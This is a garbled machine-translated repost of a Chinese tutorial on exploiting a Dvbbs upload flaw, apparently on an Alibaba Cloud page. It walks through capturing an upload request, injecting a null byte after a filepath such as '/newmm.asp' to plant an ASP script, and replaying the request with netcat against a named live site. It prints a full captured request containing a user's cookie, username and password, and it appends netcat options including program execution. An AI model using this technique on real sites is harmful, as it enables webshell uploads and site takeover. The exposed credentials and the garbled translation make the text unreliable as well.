PHP and ASP Upload vulnerability inquiry _ PHP Tutorial-php Tutorial

Source: Internet
Author: User
Explore PHP and ASP Upload vulnerabilities. The principle of using the 1-pass vulnerability is only for asp and php scripts uploaded in form format. *** nc (netcat) is used to submit data packets. run the following command on the dos interface: nc-vvwww. ***. com80-vv: Echo 80: www Port 1.t 1. the vulnerability is used only for asp and php scripts uploaded in form format ***

Nc (netcat)
Used to submit data packets
Run the following command on the dos interface:
Nc-vv www. ****. com 80 <1.txt
-Vv: Echo
80: www Port
1. txt: refers to the data packet you want to send (for more usage instructions, refer to the post in this area)
Wse (wsockexpert) monitors local ports and captures packets submitted by ie

2 vulnerability principle

Assumptions in the following example

Www host: www. ****. com;
Bbs path:/bbs/
The vulnerability is due to the study of file uploading through the dynamic network. it is recommended that you have some programming experience to check the upfile. asp file of dvbbs. you do not need to understand it all. Upfile is uploaded by generating a form table, as shown below:

 

Variables used ::

Filepath default value: uploadface attribute hiden
Act default value upload attribute hiden
File1 is the file you want to upload.

The key is the filepath variable!

By default, our files are uploaded to www. ***. com/bbs/uploadface/

The file is named after your upload time, which is the sentence in upfile.

Filename = formpath & year (now) & month (now) & day (now) & hour (now) & minute (now) & second (now) & rannum &". "& fileext
--------------------------------------

We know that the data in the computer is "1". anyone who has used C language for Peugeot knows: char data [] = "bbs". The data array length is 4: B s.
What if we construct the filepath as follows?

Filepath = "/newmm. asp"
When the file we uploaded in 2004.09.242.168.24 is changed, it will not be changed: _ blank> http: // www. ***. com/bbs/uploadface/2004092402.16.jpg: _ blank> http: // www. ***. com/newmm. asp/2004092402.16.jpg

In this way, when the server receives the filepath data, the data after detecting newmm. asp is understood as filepath. In this way, the uploaded files, such as c:. asp, are saved as: _ blank> http: // www. ***. com/newmm. asp.

3 supplement later

After the vulnerability is published, many websites have processed it, but none of them can filter and process filepath. There are a lot of websites. The only difference is that the number of changes with the nhiden.exe parameter is the upload vulnerability exploitation tool or the filepath variable exploitation tool (Veteran's. There are similar vulnerabilities in website plug-ins. what I want to say is not to rely on specialized tools. Change the filepath variable in the package caught by wse and submit it in nc. Even if he adds n hiden variables, it does not help. Of course, if we strictly filter filepath, these theories will end when our new theory was born!

4. detailed instance
One pair of wse (( saved to 1.txt ):

post /bbs/upphoto/upfile.asp http/1.1
accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/x-shockwave-flash, application/vnd.ms-excel,

application/vnd.ms-powerpoint, application/msword, */*
referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp
accept-language: zh-cn
content-type: multipart/form-data;

boundary=-----------7d423a138d0278
accept-encoding: gzip, deflate
user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322)
host: _blank>www.xin126.com
content-length: 1969
connection: keep-alive
cache-control: no-cache
cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf;

iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37;

username=szjwwwww; pass=5211314; dl=0; userid=62;

ltstyle=0; logintry=1; userpass=eb03f6c72908fd84

-----------------------------7d423a138d0278
content-disposition: form-data; name="filepath"

../medias/myphoto/
-----------------------------7d423a138d0278
... ...

Upload
--------------- 7d423a138d0278 -----------------

、Ultraeditopen 1.txt to change data:

......
----------------------------- 7d423a138d0278
Content-disposition: form-data; name = "filepath"
/Newmm. asp <= The black color indicates that a space is 0x20. change it to 0x00.
......
----------------------------

3. recalculate the cookie length and submit the cookie by nc.

Nc-vv _ blank> www.xin126.com 80 <1.txt

Ultraedit is a 16-bit editor that can be downloaded from the Internet.
We mainly used to write the ending Peugeot: ===> 16 bits: 0x00 or 00 h
In fact, when you change it, you just need to add a 00 at the end of filepath.

Calculate the cookie length ==> after you change fillepath, it must be or + or-the cookie length has changed


......
Host: _ blank> www.xin126.com
Content-length: 1969 <======
Connection: keep-alive
Cache-control: no-cache
......

Computing? A letter or number is 1

Solutions for upload vulnerabilities: (for reference only)

1. Generally, the upload path is processed as a variable.
==> Our countermeasure is to convert filepath into a constant...
This method is currently the most effective (I think)

2. strengthen the processing. it turns out that we have finished reading this article.
We continue to read the start point of the next variable, and the processing will be OK.

Appendix: NC Usage:

Monitor external hosts
Nc [-options] hostname port [s] [ports]...
Listen to local hosts
Nc-l-p port [options] [hostname] [port]
Options:
-D detach from console, stealth mode
-E prog inbound program to exec [dangerous!]
-G gateway source-routing hop point [s], up to 8
-G num source-routing pointer: 4, 8, 12 ,...
-H this cruft
-I secs delay interval for lines sent, ports scanned
-L listen mode, for inbound connects
-L listen harder, re-listen on socket close
-N numeric-only ip addresses, no dns
-O file hex dump of traffic
-P port local port number
-R randomize local and remote ports
-S addr local source address
-T answer telnet negotiation
-U udp mode
-V verbose [use twice to be more verbose]
-W secs timeout for connects and final net reads
-Z zero-I/o mode [used for scanning]
Port numbers can be inpidual or ranges: m-n [random sive]

(Edit responsibility:

The principle of using http://www.bkjia.com/PHPjc/446845.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/446845.htmlTechArticle1 transfer vulnerability is only for form format Upload asp and php script *** nc (netcat) is used to submit data packet dos interface run: nc-vv www. ***. com 80-vv: Echo 80: www port 1. t...

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.